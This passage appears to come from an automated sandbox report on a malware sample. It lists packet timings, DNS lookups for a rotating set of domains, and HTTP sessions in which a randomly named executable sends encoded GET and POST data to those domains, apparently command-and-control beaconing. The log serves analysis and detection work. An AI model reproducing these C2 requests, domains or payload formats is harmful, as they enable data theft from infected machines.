                                                                        Nov 7, 2024 17:59:31.018398046 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:31.127082109 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:31.130919933 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:31.718823910 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:32.736213923 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:32.741102934 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:32.741178989 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:32.748753071 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:32.753602028 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567106962 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567126036 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567140102 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567148924 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567437887 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:33.675378084 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.677046061 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:33.680926085 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:33.685836077 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:38.710841894 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:38.718683958 CET80498713.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:38.718792915 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:38.729836941 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:38.736440897 CET80498713.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:39.344089031 CET80498713.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:39.344161034 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:40.232981920 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:40.318098068 CET80498713.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:41.252572060 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:41.257714033 CET80498723.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:41.257816076 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:41.271070004 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:41.276051044 CET80498723.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:41.900665045 CET80498723.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:41.905312061 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:42.781847000 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:42.789081097 CET80498723.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:43.799882889 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:43.805075884 CET80498733.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:43.805162907 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:43.825514078 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:43.830665112 CET80498733.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:43.831280947 CET80498733.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:45.342012882 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:45.347194910 CET80498733.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:45.347248077 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:46.362838984 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:46.369025946 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:46.370970011 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:46.378237963 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:46.383543015 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:48.111644983 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:48.144001007 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:48.146161079 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:48.150831938 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:48.155586958 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:53.198227882 CET4987580192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:53.203794003 CET80498753.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:53.203871012 CET4987580192.168.2.73.33.130.190
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 7, 2024 17:57:41.744288921 CET | 192.168.2.7 | 1.1.1.1 | 0x7eaa | Standard query (0) | www.corpseflowerwatch.org | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:00.626985073 CET | 192.168.2.7 | 1.1.1.1 | 0xbd8d | Standard query (0) | www.4nk.education | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:14.502022028 CET | 192.168.2.7 | 1.1.1.1 | 0x4592 | Standard query (0) | www.migraine-massages.pro | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:27.923772097 CET | 192.168.2.7 | 1.1.1.1 | 0x6d4d | Standard query (0) | www.vnxoso88.art | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:41.423681021 CET | 192.168.2.7 | 1.1.1.1 | 0x46ec | Standard query (0) | www.pluribiz.life | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:55.408756018 CET | 192.168.2.7 | 1.1.1.1 | 0x633 | Standard query (0) | www.kdtzhb.top | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:09.581321955 CET | 192.168.2.7 | 1.1.1.1 | 0x885f | Standard query (0) | www.evoo.website | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:25.036891937 CET | 192.168.2.7 | 1.1.1.1 | 0xeeb3 | Standard query (0) | www.astorg-group.info | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:38.690839052 CET | 192.168.2.7 | 1.1.1.1 | 0xf1ac | Standard query (0) | www.fiqsth.vip | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:53.159305096 CET | 192.168.2.7 | 1.1.1.1 | 0x2560 | Standard query (0) | www.bio-thymus.com | A (IP address) | IN (0x0001) | false
Nov 7, 2024 18:00:06.783601046 CET | 192.168.2.7 | 1.1.1.1 | 0xc5ff | Standard query (0) | www.wukong.college | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 7, 2024 17:57:41.768758059 CET | 1.1.1.1 | 192.168.2.7 | 0x7eaa | No error (0) | www.corpseflowerwatch.org | corpseflowerwatch.org | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:57:41.768758059 CET | 1.1.1.1 | 192.168.2.7 | 0x7eaa | No error (0) | corpseflowerwatch.org | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:57:41.768758059 CET | 1.1.1.1 | 192.168.2.7 | 0x7eaa | No error (0) | corpseflowerwatch.org | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:00.705137968 CET | 1.1.1.1 | 192.168.2.7 | 0xbd8d | No error (0) | www.4nk.education | webredir.vip.gandi.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:58:00.705137968 CET | 1.1.1.1 | 192.168.2.7 | 0xbd8d | No error (0) | webredir.vip.gandi.net | - | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:14.640466928 CET | 1.1.1.1 | 192.168.2.7 | 0x4592 | No error (0) | www.migraine-massages.pro | - | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:27.993077040 CET | 1.1.1.1 | 192.168.2.7 | 0x6d4d | No error (0) | www.vnxoso88.art | vnxoso88.art | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:58:27.993077040 CET | 1.1.1.1 | 192.168.2.7 | 0x6d4d | No error (0) | vnxoso88.art | - | 66.29.146.14 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:41.838493109 CET | 1.1.1.1 | 192.168.2.7 | 0x46ec | No error (0) | www.pluribiz.life | - | 209.74.64.58 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:58:55.767465115 CET | 1.1.1.1 | 192.168.2.7 | 0x633 | No error (0) | www.kdtzhb.top | - | 47.242.89.146 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:09.628746986 CET | 1.1.1.1 | 192.168.2.7 | 0x885f | No error (0) | www.evoo.website | - | 128.65.195.180 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:25.098483086 CET | 1.1.1.1 | 192.168.2.7 | 0xeeb3 | No error (0) | www.astorg-group.info | webredir.vip.gandi.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:59:25.098483086 CET | 1.1.1.1 | 192.168.2.7 | 0xeeb3 | No error (0) | webredir.vip.gandi.net | - | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:38.706545115 CET | 1.1.1.1 | 192.168.2.7 | 0xf1ac | No error (0) | www.fiqsth.vip | fiqsth.vip | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:59:38.706545115 CET | 1.1.1.1 | 192.168.2.7 | 0xf1ac | No error (0) | fiqsth.vip | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:38.706545115 CET | 1.1.1.1 | 192.168.2.7 | 0xf1ac | No error (0) | fiqsth.vip | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:53.194895029 CET | 1.1.1.1 | 192.168.2.7 | 0x2560 | No error (0) | www.bio-thymus.com | bio-thymus.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:59:53.194895029 CET | 1.1.1.1 | 192.168.2.7 | 0x2560 | No error (0) | bio-thymus.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:59:53.194895029 CET | 1.1.1.1 | 192.168.2.7 | 0x2560 | No error (0) | bio-thymus.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 18:00:07.343774080 CET | 1.1.1.1 | 192.168.2.7 | 0xc5ff | No error (0) | www.wukong.college | - | 47.52.221.8 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49812 | 3.33.130.190 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 17:57:41.814068079 CET | 398 | OUT |
GET /yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.corpseflowerwatch.org
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 7, 2024 17:57:45.552470922 CET | 417 | IN |
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 07 Nov 2024 16:57:45 GMT
Content-Type: text/html
Content-Length: 277
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49840 | 217.70.184.50 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 17:58:00.725179911 CET | 646 | OUT |
POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: 7j=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTFOWIIaSwNoVBNbBwjteBSyD+rNMb6KBMWbE5/y9FLUW8Fb28w==
Nov 7, 2024 17:58:01.520694971 CET | 608 | IN |
HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 07 Nov 2024 16:58:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49842 | 217.70.184.50 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 17:58:03.416752100 CET | 666 | OUT |
POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: 7j=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDK46pp6McX0OXfc0dGca8x8xX6yqA1P3Ho0X+qI7deDVY5DZ/k=
Nov 7, 2024 17:58:04.139786959 CET | 608 | IN |
HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 07 Nov 2024 16:58:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49843 | 217.70.184.50 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 17:58:06.001827955 CET | 1679 | OUT |
POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1247
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=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 [TRUNCATED]
                                                                        Nov 7, 2024 17:58:06.796307087 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:06 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        4 | 192.168.2.7 | 49844 | 217.70.184.50 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:08.549515009 CET | 390 | OUT | GET /gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.4nk.education
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:58:09.371634007 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:58:09 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Security-Policy: default-src 'self'; script-src 'nonce-76218b420b474a8caea91096fd30ab60';
                                                                        Vary: Accept-Language
                                                                        Data Raw: 39 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 37 36 32 31 38 62 34 32 30 62 34 37 34 61 38 63 61 65 61 39 31 30 39 36 66 64 33 30 61 62 36 30 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                        Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-76218b420b474a8caea91096fd30ab60';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
                                                                        Nov 7, 2024 17:58:09.371654987 CET | 1236 | IN | Data Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                        Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
                                                                        Nov 7, 2024 17:58:09.371665955 CET | 161 | IN | Data Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                        Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>
                                                                        Nov 7, 2024 17:58:09.371670961 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.7 | 49845 | 199.59.243.227 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:14.664915085 CET | 670 | OUT | POST /ym43/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.migraine-massages.pro
                                                                        Origin: http://www.migraine-massages.pro
                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 79 42 4d 4e 43 38 51 66 47 39 4a 77 43 75 55 33 7a 52 42 50 36 79 76 37 7a 6f 66 68 46 6e 70 43 6d 34 65 47 38 62 41 44 33 2b 31 41 6e 62 6e 4f 41 3d 3d
                                                                        Data Ascii: 7j=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CyBMNC8QfG9JwCuU3zRBP6yv7zofhFnpCm4eG8bAD3+1AnbnOA==
                                                                        Nov 7, 2024 17:58:15.275690079 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        date: Thu, 07 Nov 2024 16:58:14 GMT
                                                                        content-type: text/html; charset=utf-8
                                                                        content-length: 1154
                                                                        x-request-id: 7124d638-8c8d-474a-9e84-3babc42e9444
                                                                        cache-control: no-store, max-age=0
                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                        vary: sec-ch-prefers-color-scheme
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                        set-cookie: parking_session=7124d638-8c8d-474a-9e84-3babc42e9444; expires=Thu, 07 Nov 2024 17:13:15 GMT; path=/
                                                                        connection: close
